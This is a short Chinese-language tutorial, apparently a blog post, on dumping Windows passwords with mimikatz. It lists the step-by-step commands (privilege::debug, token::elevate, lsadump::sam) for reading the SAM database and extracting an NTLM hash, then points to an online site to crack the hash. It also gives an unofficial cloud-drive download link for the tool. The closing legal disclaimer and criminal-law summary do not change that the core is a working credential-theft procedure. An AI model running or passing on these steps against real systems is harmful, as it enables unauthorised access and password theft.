用mimikatz轻松获取Windows密码到解码
电脑管家
mimikatz是一款开源的Windows密码获取工具,最初是由Benjamin Delpy开发的。它可以通过多种方式获取Windows系统的各种密码,其中包括使用LSA Secrets、MSV/MSV1_0、WDigest、Kerberos等技术来获取Windows本地用户、域用户、普通用户、远程用户、缓存密码等信息。mimikatz获取密码的原理是通过破解Windows系统的存储密码机制,它的功能非常强大,可以说是黑客必备工具之一。
这里用windows11系统做测试先给Windows11设置个密码,打开cmd(命令提示符)输入命令设置密码:
net user Administrator hello
这里将密码设置为hello
打开Mimikatz工具,提升至debug权限(右键Mimikatz.exe以管理员身份运行)在提示符下,输入命令"privilege::debug”
privilege::debug
在将权限提升至 NT AUTHORITYSYSTEM,输入命令
token::elevate
获取到NTLM的hash,输入命令:
lsadump::sam
这里获得Hash NTLM: 066ddfd4ef0e9cd7c256fe77191ef43c
拿到这个去在线解密一下,获得密码
解密网址 https://cmd5.com/
获取mimikatz工具:链接:https://pan.baidu.com/s/1p611WGp3_G_ErpL4oLs5pw 提取码:h496
| 非常重要的一点是,我们要明确使用计算机和编程技术的目的是为了学习和测试,而不是进行非法攻击或者违法行为。编写和使用代码时,我们必须遵守法律法规,并且获得相关授权。如果您有合法的目的和授权,那么可以继续进行测试和使用。但是,如果您违反了法律法规或者未经授权使用,后果将由您自己承担。请务必谨慎行事,遵守法律规定,以确保计算机和网络的安全。 |
| 小黑板:非法攻击计算机系统是一种违法行为,违反了计算机安全法规。根据中华人民共和国刑法,非法攻击计算机系统可能构成非法侵入计算机信息系统罪、非法获取计算机信息系统数据、非法控制计算机信息系统罪、提供侵入、非法控制计算机信息系统程序、工具罪等罪名。根据《中华人民共和国刑法》规定,违反国家规定,侵入前款规定以外的计算机信息系统或者采用其他技术手段,获取该计算机信息系统中存储、处理或者传输的数据,或者对该计算机信息系统实施非法控制,情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处三年以上七年以下有期徒刑,并处罚金。提供专门用于侵入、非法控制计算机信息系统的程序、工具,或者明知他人实施侵入、非法控制计算机信息系统的违法犯罪行为而为其提供程序、工具,情节严重的,依照前款的规定处罚。单位犯前三款罪的,对单位判处罚金,并对其直接负责的主管人员和其他直接责任人员,依照各该款的规定处罚 |
